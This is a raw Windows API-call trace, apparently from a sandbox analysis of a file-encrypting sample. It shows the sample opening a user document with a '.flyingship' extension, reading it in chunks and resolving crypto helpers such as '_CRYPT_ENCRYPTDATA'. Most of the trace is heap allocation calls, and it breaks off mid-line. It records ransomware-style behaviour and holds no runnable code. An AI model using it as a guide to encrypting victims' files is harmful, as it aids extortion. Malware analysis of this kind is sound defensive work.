[0169.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0169.041] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.flyingship.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f8kguilkgyer.flyingship.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0169.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0169.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0169.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0169.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0169.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0169.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0169.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0169.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0169.044] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0169.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0169.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0169.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0169.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0169.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0169.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0169.044] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0169.044] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0169.044] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0169.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0169.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0169.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0169.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0169.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0169.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0169.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0169.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0169.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0169.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0169.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0169.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0169.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0169.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0169.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0169.046] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0169.046] ReadFile (in: hFile=0x120, lpBuffer=0xa6b008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa6b008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0169.050] ReadFile (in: hFile=0x120, lpBuffer=0xa6b008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa6b008*, lpNumberOfBytesRead=0x87efb8*=0x38f3, lpOverlapped=0x0) returned 1 [0169.051] ReadFile (in: hFile=0x120, lpBuffer=0xa6b008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa6b008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0169.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0169.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0169.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0169.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0169.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x138f3) returned 0x9d5188 [0169.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0169.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0169.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0169.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0169.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0169.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0169.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x138f3) returned 0x9e8a88 [0169.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0169.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0169.055] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0169.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0169.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0169.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0169.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0169.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x138f3) returned 0x9d5188 [0169.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0169.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0169.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0169.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0169.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0169.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0169.055] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0169.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0169.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0169.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0169.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0169.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0169.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0169.056] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0169.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0169.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0169.056] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0169.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0169.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0169.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0169.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2678 [0169.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0169.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0169.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0169.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0169.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x138f3) returned 0x9d5188 [0169.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0169.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2698 [0169.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0169.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0169.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0169.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2828 [0169.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0169.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0169.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0169.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2858 [0169.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0169.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0169.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0169.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3f0 [0169.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0169.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0169.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0169.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0169.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0169.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x138f3) returned 0x9fc388 [0169.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0169.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0169.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0169.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0169.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0169.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0169.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0169.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0169.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0169.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0169.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0169.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0169.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0169.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0169.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0169.060] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0169.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0169.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0169.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0169.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0169.060] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0169.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0169.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0169.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0169.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0169.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0169.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0169.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0169.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0169.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0169.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0169.060] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0169.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0169.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0169.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0169.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26f8 [0169.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0169.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0169.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0169.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0169.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba330 [0169.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0169.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0169.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0169.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0169.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0169.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0169.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0169.061] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0169.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0169.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0169.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0169.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0169.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0169.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0169.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0169.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0169.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0169.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0169.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0169.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0169.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0169.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0169.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0169.062] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0169.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0169.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0169.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0169.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0169.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0169.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0169.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0169.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0169.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0169.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0169.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0169.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0169.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0169.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0169.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0169.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0169.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0169.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0169.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0169.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0169.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0169.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0169.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0169.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0169.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0169.063] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0169.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0169.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0169.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0169.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0169.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0169.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0169.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0169.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0169.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0169.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0169.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0169.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0169.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0169.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0169.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0169.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0169.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0169.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0169.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0169.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0169.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0169.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0169.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0169.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0169.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0169.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0169.064] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 